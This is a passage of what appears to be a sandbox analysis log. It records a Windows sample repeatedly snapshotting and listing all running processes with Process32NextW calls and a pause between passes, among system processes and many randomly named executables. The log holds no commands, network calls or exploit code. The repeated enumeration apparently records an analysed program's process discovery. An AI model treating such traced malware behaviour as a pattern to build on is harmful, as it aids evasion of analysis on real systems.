szExeFile="infant coins forced.exe")) returned 1 [0151.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.863] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0151.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0151.875] CloseHandle (hObject=0xbc) returned 1 [0151.875] Sleep (dwMilliseconds=0x12c) [0152.265] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.272] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.273] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.274] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.276] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.401] CloseHandle (hObject=0xc4) returned 1 [0152.401] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.406] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.415] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 